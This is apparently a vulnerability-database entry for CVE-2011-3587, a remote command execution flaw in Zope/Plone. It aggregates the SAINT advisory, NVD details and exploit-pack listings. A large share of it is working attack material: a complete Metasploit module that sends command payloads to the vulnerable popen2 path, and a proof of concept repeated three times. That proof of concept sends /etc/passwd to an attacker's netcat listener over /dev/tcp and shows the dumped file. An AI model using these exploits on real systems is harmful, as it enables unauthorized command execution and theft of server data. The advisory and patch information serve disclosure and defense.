ID SAINT:9CF5C6C24AE80412715049E11134256AType saintReporter SAINT CorporationModified 2012-01-13T00:00:00
Description
Added: 01/13/2012CVE-2011-3587 49857 76105
Background
Plone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites.
Problem
Plone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands.
Resolution
Upgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587.
References
<http://plone.org/products/plone/security/advisories/20110928>
Limitations
This exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS.
Platforms
Windows
{"title": "Plone Zope SAXutils Command Execution", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/plone_zope_saxutils_cmd_exec", "id": "SAINT:9CF5C6C24AE80412715049E11134256A", "published": "2012-01-13T00:00:00", "type": "saint", "references": [], "edition": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3587"]}, {"type": "exploitdb", "idList": ["EDB-ID:18262"]}, {"type": "d2", "idList": ["D2SEC_ZOPEPLONE"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B47D124EE589B60CD13076B667252C83"]}, {"type": "saint", "idList": ["SAINT:C999148B18225353D8171CA71E6C7429", "SAINT:72DF8F5D53D254B727E1892FBA9144EA"]}, {"type": "dsquare", "idList": ["E-21"]}, {"type": "seebug", "idList": ["SSV:26110", "SSV:72431"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108200", "PACKETSTORM:108071"]}, {"type": "nessus", "idList": ["PLONE_20110928.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PLONE_POPEN2"]}, {"type": "canvas", "idList": ["PLONE"]}], "modified": "2019-05-29T19:19:31", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2019-05-29T19:19:31", "rev": 2}, "vulnersScore": 8.1}, "cvelist": ["CVE-2011-3587"], "modified": "2012-01-13T00:00:00", "viewCount": 28, "description": "Added: 01/13/2012 \nCVE: [CVE-2011-3587](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587>) \nBID: [49857](<http://www.securityfocus.com/bid/49857>) \nOSVDB: [76105](<http://www.osvdb.org/76105>) \n\n\n### Background\n\nPlone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites. \n\n### Problem\n\nPlone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands. \n\n### Resolution\n\nUpgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587. \n\n### References\n\n<http://plone.org/products/plone/security/advisories/20110928> \n\n\n### Limitations\n\nThis exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "bulletinFamily": "exploit", "reporter": "SAINT Corporation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "lastseen": "2019-05-29T19:19:31", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:06", "description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.", "edition": 4, "cvss3": {}, "published": "2011-10-10T10:55:00", "title": "CVE-2011-3587", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3587"], "modified": "2011-10-21T02:56:00", "cpe": ["cpe:/a:zope:zope:2.13.2", "cpe:/a:zope:zope:2.12.13", "cpe:/a:plone:plone:4.2a1", "cpe:/a:zope:zope:2.12.16", "cpe:/a:zope:zope:2.12.1", "cpe:/a:zope:zope:2.12.4", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:4.0.3", "cpe:/a:zope:zope:2.13.4", "cpe:/a:plone:plone:4.0.4", "cpe:/a:zope:zope:2.12.0", "cpe:/a:zope:zope:2.12.15", "cpe:/a:zope:zope:2.13.7", "cpe:/a:zope:zope:2.12.9", "cpe:/a:zope:zope:2.12.12", "cpe:/a:zope:zope:2.13.0", "cpe:/a:plone:plone:4.2a2", "cpe:/a:zope:zope:2.12.19", "cpe:/a:zope:zope:2.12.11", "cpe:/a:zope:zope:2.12.17", "cpe:/a:plone:plone:4.2", "cpe:/a:plone:plone:4.0.1", "cpe:/a:zope:zope:2.12.20", "cpe:/a:zope:zope:2.12.8", "cpe:/a:zope:zope:2.13.5", "cpe:/a:plone:plone:4.0.8", "cpe:/a:zope:zope:2.12.3", "cpe:/a:zope:zope:2.12.14", "cpe:/a:plone:plone:4.1", "cpe:/a:zope:zope:2.12.5", "cpe:/a:zope:zope:2.12.2", "cpe:/a:zope:zope:2.13.6", "cpe:/a:zope:zope:2.13.3", "cpe:/a:zope:zope:2.13.10", "cpe:/a:plone:plone:4.0.9", "cpe:/a:zope:zope:2.12.7", "cpe:/a:zope:zope:2.13.9", "cpe:/a:zope:zope:2.12.18", "cpe:/a:zope:zope:2.13.8", "cpe:/a:zope:zope:2.13.1", "cpe:/a:plone:plone:4.0.6.1", "cpe:/a:zope:zope:2.12.10", "cpe:/a:zope:zope:2.12.6"], "id": "CVE-2011-3587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3587", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:plone:plone:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.16:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a4:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b3:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.20:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a3:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.15:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.5:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.12:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:b1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a3:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.18:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.13:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:c1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.14:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:b4:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a2:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.8:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a4:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.17:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.6:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.11:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.19:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.0:a1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.2a2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.0:a1:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.2a1:*:*:*:*:*:*:*", "cpe:2.3:a:zope:zope:2.12.3:*:*:*:*:*:*:*"]}], "d2": [{"lastseen": "2019-05-29T19:19:04", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "**Name**| d2sec_zopeplone \n---|--- \n**CVE**| CVE-2011-3587 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Zope/Plone Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2011-10-10T10:55:00", "published": "2011-10-10T10:55:00", "id": "D2SEC_ZOPEPLONE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_zopeplone", "title": "DSquare Exploit Pack: D2SEC_ZOPEPLONE", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "**Name**| plone \n---|--- \n**CVE**| CVE-2011-3587 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Plone Zope Remote Command Execution \n**Notes**| CVE Name: CVE-2011-3587 \nNotes: \n \nVulnerable versions include: \nPlone 4.0 (through 4.0.9); Plone 4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x. \n \n \nRepeatability: Infinite \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587 \n\n", "edition": 2, "modified": "2011-10-10T10:55:00", "published": "2011-10-10T10:55:00", "id": "PLONE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/plone", "title": "Immunity Canvas: PLONE", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "Added: 01/13/2012 \nCVE: [CVE-2011-3587](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587>) \nBID: [49857](<http://www.securityfocus.com/bid/49857>) \nOSVDB: [76105](<http://www.osvdb.org/76105>) \n\n\n### Background\n\nPlone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites. \n\n### Problem\n\nPlone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands. \n\n### Resolution\n\nUpgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587. \n\n### References\n\n<http://plone.org/products/plone/security/advisories/20110928> \n\n\n### Limitations\n\nThis exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "edition": 4, "modified": "2012-01-13T00:00:00", "published": "2012-01-13T00:00:00", "id": "SAINT:C999148B18225353D8171CA71E6C7429", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/plone_zope_saxutils_cmd_exec", "title": "Plone Zope SAXutils Command Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "Added: 01/13/2012 \nCVE: [CVE-2011-3587](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3587>) \nBID: [49857](<http://www.securityfocus.com/bid/49857>) \nOSVDB: [76105](<http://www.osvdb.org/76105>) \n\n\n### Background\n\nPlone is a free and open source content management system built on top of the Zope application server. Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites. \n\n### Problem\n\nPlone fails to properly sanitize user-supplied input passed to cmd parameter in p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2. This can be exploited to execute arbitrary shell commands. \n\n### Resolution\n\nUpgrade to Plone 2.12.20 or 2.13.10 or apply patch Products.Zope_Hotfix_CVE_2011_3587. \n\n### References\n\n<http://plone.org/products/plone/security/advisories/20110928> \n\n\n### Limitations\n\nThis exploit has been tested against Plone 4.1 on Fedora 13 Linux and Plone 4.0.9 on Ubuntu 10.04 LTS. \n\n### Platforms\n\nWindows \nLinux \nMac OS X \n \n\n", "edition": 1, "modified": "2012-01-13T00:00:00", "published": "2012-01-13T00:00:00", "id": "SAINT:72DF8F5D53D254B727E1892FBA9144EA", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/plone_zope_saxutils_cmd_exec", "type": "saint", "title": "Plone Zope SAXutils Command Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:26", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "Plone and Zope Remote CMD Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108200", "href": "https://packetstormsecurity.com/files/108200/Plone-and-Zope-Remote-CMD-Injection-Exploit.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Plone and Zope Remote CMD Injection Exploit', \n'Description' => %q{ \nUnspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x \nthrough 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute \narbitrary commands via vectors related to the p_ class in OFS/misc_.py and \nthe use of Python modules. \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Plone Security team', # Vulnerability discovery \n'Nick Miles', # Original exploit \n'TecR0c' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2011-3587'], \n['URL', 'http://www.exploit-db.com/exploits/18262/'], \n['URL', 'http://plone.org/products/plone/security/advisories/20110928'] \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic telnet perl ruby', \n} \n}, \n'Platform' => ['unix', 'linux'], \n'Arch' => ARCH_CMD, \n'Targets' => [['Automatic',{}]], \n'DisclosureDate' => 'Oct 04 2011', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('URI',[true, \"The path to the Plone installation\", \"/\"]), \n],self.class) \nregister_autofilter_ports([ 8080 ]) \nend \n \ndef check \nuri = datastore['URI'] \nuri << '/' if uri[-1,1] != '/' \nuri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' \n \nres = send_request_raw( \n{ \n'uri' => uri \n}, 25) \nif (res.headers['Bobo-Exception-Type'] =~ /zExceptions.BadRequest/) \nreturn Exploit::CheckCode::Vulnerable \nend \n# patched == zExceptions.NotFound \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nuri = datastore['URI'] \nuri << '/' if uri[-1,1] != '/' \nuri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2' \n \nsend_request_cgi( \n{ \n'method' => 'POST', \n'uri' => uri, \n'vars_post' => \n{ \n'cmd' => payload.encoded, \n} \n}, 0.5) # short timeout, we don't care about the response \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108200/plone_popen2.rb.txt"}, {"lastseen": "2016-12-05T22:20:44", "description": "", "published": "2011-12-21T00:00:00", "type": "packetstorm", "title": "Plone / Zope Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-21T00:00:00", "id": "PACKETSTORM:108071", "href": "https://packetstormsecurity.com/files/108071/Plone-Zope-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Plone - Remote Command Execution \n# Date: 12/21/2011 \n# Author: Nick Miles (www.npenetrable.com) \n# Tested on: 12/21/2011 \n# CVE : CVE-2011-3587 \n \nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone \n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x. \nVersions Not Affected: Versions of Plone that use Zope other than Zope \n2.12.x and Zope 2.13.x. \n \nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928 \n \nYou can execute any command on the remote Plone server with the \nfollowing request \nif the server is Unix/Linux based (Note: you won't get returned the \nresults of the command): \n \nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command \nto run> \n \nExample: \n \nListen for a connection: \n$ nc -l 4040 \n \nOn victim, visit: \nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040 \n \nResponse: \n$ nc -l 4040 \nroot:x:0:0:root:/root:/bin/bash \nbin:x:1:1:bin:/bin:/sbin/nologin \ndaemon:x:2:2:daemon:/sbin:/sbin/nologin \nadm:x:3:4:adm:/var/adm:/sbin/nologin \nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin \nsync:x:5:0:sync:/sbin:/bin/sync \nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown \nhalt:x:7:0:halt:/sbin:/sbin/halt \nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin \nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin \noperator:x:11:0:operator:/root:/sbin/nologin \ngames:x:12:100:games:/usr/games:/sbin/nologin \ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin \nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin \nnobody:x:99:99:Nobody:/:/sbin/nologin \nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin \nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin \npostfix:x:89:89::/var/spool/postfix:/sbin/nologin \nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin \nntp:x:38:38::/etc/ntp:/sbin/nologin \ntcpdump:x:72:72::/:/sbin/nologin \napache:x:48:48:Apache:/var/www:/sbin/nologin \nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash \nplone:x:500:500::/home/plone:/bin/false \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108071/plonezope-exec.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:26:53", "description": "Plone and Zope Remote Command Execution PoC. CVE-2011-3587. Webapps exploits for multiple platform", "published": "2011-12-21T00:00:00", "type": "exploitdb", "title": "Plone and Zope Remote Command Execution PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-21T00:00:00", "id": "EDB-ID:18262", "href": "https://www.exploit-db.com/exploits/18262/", "sourceData": "# Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 4040\r\n\r\nOn victim, visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18262/"}], "seebug": [{"lastseen": "2017-11-19T17:56:19", "description": "BUGTRAQ ID: 49857\r\nCVE ID: CVE-2011-3587\r\n\r\nZope\u662f\u4e00\u4e2a\u5f00\u6e90\u7684web\u5e94\u7528\u670d\u52a1\u5668\uff0c\u4e3b\u8981\u7528python\u5199\u6210\r\n\r\n\r\nZope\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u975e\u6cd5\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u90e8\u7f72\u7279\u5236\u7684Web\u8bf7\u6c42\u5e76\u4ee5Zope/Plone\u670d\u52a1\u6743\u9650\u6267\u884c\u4efb\u610f\u547d\u4ee4\n0\nZope 2.13.9\r\nZope 2.13.8\r\nZope 2.13\r\nZope 2.12.19\r\nZope 2.12\r\nPlone 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nZope\r\n----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.zope.org/", "published": "2011-12-26T00:00:00", "type": "seebug", "title": "Zope\u6846\u67b6"cmd"\u53c2\u6570\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26110", "id": "SSV:26110", "sourceData": "\n # Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 4040\r\n\r\nOn victim, visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26110", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T18:29:36", "description": "BUGTRAQ ID: 49857\r\nCVE 